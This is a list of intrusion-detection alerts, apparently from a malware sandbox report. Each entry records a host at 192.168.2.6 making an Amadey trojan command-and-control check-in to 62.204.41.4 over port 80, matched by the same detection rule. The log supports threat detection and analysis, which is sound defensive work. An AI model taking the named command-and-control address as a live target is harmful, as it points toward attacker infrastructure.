Timestamp:	192.168.2.662.204.41.449952802027700 02/07/23-20:01:55.791186
SID:	2027700
Source Port:	49952
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450412802027700 02/07/23-20:04:02.064925
SID:	2027700
Source Port:	50412
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449911802027700 02/07/23-20:01:42.093950
SID:	2027700
Source Port:	49911
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450305802027700 02/07/23-20:03:35.785500
SID:	2027700
Source Port:	50305
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449751802027700 02/07/23-20:00:58.872163
SID:	2027700
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449840802027700 02/07/23-20:01:22.187785
SID:	2027700
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449898802027700 02/07/23-20:01:38.811965
SID:	2027700
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450399802027700 02/07/23-20:03:58.878195
SID:	2027700
Source Port:	50399
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450047802027700 02/07/23-20:02:22.518279
SID:	2027700
Source Port:	50047
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450145802027700 02/07/23-20:02:54.357855
SID:	2027700
Source Port:	50145
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450231802027700 02/07/23-20:03:15.107613
SID:	2027700
Source Port:	50231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450056802027700 02/07/23-20:02:24.870217
SID:	2027700
Source Port:	50056
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450228802027700 02/07/23-20:03:14.349981
SID:	2027700
Source Port:	50228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450062802027700 02/07/23-20:02:28.090658
SID:	2027700
Source Port:	50062
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450317802027700 02/07/23-20:03:38.748560
SID:	2027700
Source Port:	50317
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450219802027700 02/07/23-20:03:12.179097
SID:	2027700
Source Port:	50219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449838802027700 02/07/23-20:01:21.703798
SID:	2027700
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450457802027700 02/07/23-20:04:13.065112
SID:	2027700
Source Port:	50457
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449936802027700 02/07/23-20:01:51.820246
SID:	2027700
Source Port:	49936
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450301802027700 02/07/23-20:03:34.801016
SID:	2027700
Source Port:	50301
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450203802027700 02/07/23-20:03:08.264782
SID:	2027700
Source Port:	50203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449853802027700 02/07/23-20:01:25.706873
SID:	2027700
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449894802027700 02/07/23-20:01:37.843818
SID:	2027700
Source Port:	49894
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449755802027700 02/07/23-20:00:59.855021
SID:	2027700
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449927802027700 02/07/23-20:01:49.659609
SID:	2027700
Source Port:	49927
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450288802027700 02/07/23-20:03:31.578001
SID:	2027700
Source Port:	50288
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450158802027700 02/07/23-20:02:57.529246
SID:	2027700
Source Port:	50158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450383802027700 02/07/23-20:03:54.971539
SID:	2027700
Source Port:	50383
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449764802027700 02/07/23-20:01:01.795053
SID:	2027700
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450028802027700 02/07/23-20:02:17.895696
SID:	2027700
Source Port:	50028
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450342802027700 02/07/23-20:03:44.892172
SID:	2027700
Source Port:	50342
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449980802027700 02/07/23-20:02:02.464633
SID:	2027700
Source Port:	49980
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450472802027700 02/07/23-20:04:16.721903
SID:	2027700
Source Port:	50472
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450075802027700 02/07/23-20:02:33.175281
SID:	2027700
Source Port:	50075
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450117802027700 02/07/23-20:02:44.156964
SID:	2027700
Source Port:	50117
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450199802027700 02/07/23-20:03:07.326755
SID:	2027700
Source Port:	50199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450034802027700 02/07/23-20:02:19.362339
SID:	2027700
Source Port:	50034
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450247802027700 02/07/23-20:03:18.979917
SID:	2027700
Source Port:	50247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450314802027700 02/07/23-20:03:38.017064
SID:	2027700
Source Port:	50314
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449949802027700 02/07/23-20:01:55.074452
SID:	2027700
Source Port:	49949
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450444802027700 02/07/23-20:04:09.894977
SID:	2027700
Source Port:	50444
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450403802027700 02/07/23-20:03:59.851322
SID:	2027700
Source Port:	50403
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449908802027700 02/07/23-20:01:41.349767
SID:	2027700
Source Port:	49908
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449866802027700 02/07/23-20:01:31.109835
SID:	2027700
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450320802027700 02/07/23-20:03:39.480009
SID:	2027700
Source Port:	50320
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449736802027700 02/07/23-20:00:55.230834
SID:	2027700
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449783802027700 02/07/23-20:01:06.638994
SID:	2027700
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449996802027700 02/07/23-20:02:09.912452
SID:	2027700
Source Port:	49996
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449825802027700 02/07/23-20:01:18.559732
SID:	2027700
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449742802027700 02/07/23-20:00:56.667263
SID:	2027700
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449955802027700 02/07/23-20:01:56.500323
SID:	2027700
Source Port:	49955
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450018802027700 02/07/23-20:02:15.452445
SID:	2027700
Source Port:	50018
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450309802027700 02/07/23-20:03:36.772736
SID:	2027700
Source Port:	50309
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449947802027700 02/07/23-20:01:54.584701
SID:	2027700
Source Port:	49947
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450082802027700 02/07/23-20:02:34.890335
SID:	2027700
Source Port:	50082
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450214802027700 02/07/23-20:03:10.972258
SID:	2027700
Source Port:	50214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449993802027700 02/07/23-20:02:07.121549
SID:	2027700
Source Port:	49993
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450355802027700 02/07/23-20:03:48.094654
SID:	2027700
Source Port:	50355
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450471802027700 02/07/23-20:04:16.488079
SID:	2027700
Source Port:	50471
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449852802027700 02/07/23-20:01:25.383304
SID:	2027700
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450003802027700 02/07/23-20:02:11.648732
SID:	2027700
Source Port:	50003
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450453802027700 02/07/23-20:04:12.107650
SID:	2027700
Source Port:	50453
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449929802027700 02/07/23-20:01:50.134882
SID:	2027700
Source Port:	49929
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450177802027700 02/07/23-20:03:02.166311
SID:	2027700
Source Port:	50177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450275802027700 02/07/23-20:03:28.403496
SID:	2027700
Source Port:	50275
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449965802027700 02/07/23-20:01:59.016140
SID:	2027700
Source Port:	49965
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450293802027700 02/07/23-20:03:32.801081
SID:	2027700
Source Port:	50293
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450327802027700 02/07/23-20:03:41.188880
SID:	2027700
Source Port:	50327
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449806802027700 02/07/23-20:01:14.154494
SID:	2027700
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450425802027700 02/07/23-20:04:05.253501
SID:	2027700
Source Port:	50425
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450097802027700 02/07/23-20:02:39.099671
SID:	2027700
Source Port:	50097
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449769802027700 02/07/23-20:01:03.043961
SID:	2027700
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450410802027700 02/07/23-20:04:01.580414
SID:	2027700
Source Port:	50410
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450054802027700 02/07/23-20:02:24.270996
SID:	2027700
Source Port:	50054
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449787802027700 02/07/23-20:01:09.515244
SID:	2027700
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450388802027700 02/07/23-20:03:56.189946
SID:	2027700
Source Port:	50388
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450036802027700 02/07/23-20:02:19.847586
SID:	2027700
Source Port:	50036
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450092802027700 02/07/23-20:02:37.868052
SID:	2027700
Source Port:	50092
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450232802027700 02/07/23-20:03:15.344051
SID:	2027700
Source Port:	50232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449957802027700 02/07/23-20:01:56.989416
SID:	2027700
Source Port:	49957
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450031802027700 02/07/23-20:02:18.637614
SID:	2027700
Source Port:	50031
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450250802027700 02/07/23-20:03:19.754500
SID:	2027700
Source Port:	50250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449862802027700 02/07/23-20:01:30.125467
SID:	2027700
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450481802027700 02/07/23-20:04:18.893120
SID:	2027700
Source Port:	50481
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450072802027700 02/07/23-20:02:32.475919
SID:	2027700
Source Port:	50072
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449779802027700 02/07/23-20:01:05.232360
SID:	2027700
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449870802027700 02/07/23-20:01:32.078335
SID:	2027700
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449998802027700 02/07/23-20:02:10.416841
SID:	2027700
Source Port:	49998
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450108802027700 02/07/23-20:02:41.932133
SID:	2027700
Source Port:	50108
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450149802027700 02/07/23-20:02:55.389818
SID:	2027700
Source Port:	50149
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450026802027700 02/07/23-20:02:17.408058
SID:	2027700
Source Port:	50026
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449975802027700 02/07/23-20:02:01.204512
SID:	2027700
Source Port:	49975
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450222802027700 02/07/23-20:03:12.933465
SID:	2027700
Source Port:	50222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449797802027700 02/07/23-20:01:12.000477
SID:	2027700
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450204802027700 02/07/23-20:03:08.498529
SID:	2027700
Source Port:	50204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450398802027700 02/07/23-20:03:58.636270
SID:	2027700
Source Port:	50398
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449834802027700 02/07/23-20:01:20.722458
SID:	2027700
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450400802027700 02/07/23-20:03:59.133077
SID:	2027700
Source Port:	50400
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450008802027700 02/07/23-20:02:12.917280
SID:	2027700
Source Port:	50008
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449811802027700 02/07/23-20:01:15.342261
SID:	2027700
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450044802027700 02/07/23-20:02:21.772716
SID:	2027700
Source Port:	50044
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450393802027700 02/07/23-20:03:57.421090
SID:	2027700
Source Port:	50393
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450041802027700 02/07/23-20:02:21.067703
SID:	2027700
Source Port:	50041
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449967802027700 02/07/23-20:01:59.487215
SID:	2027700
Source Port:	49967
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449909802027700 02/07/23-20:01:41.612708
SID:	2027700
Source Port:	49909
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450237802027700 02/07/23-20:03:16.563327
SID:	2027700
Source Port:	50237
Destination Port:	80
Protocol:	TCP
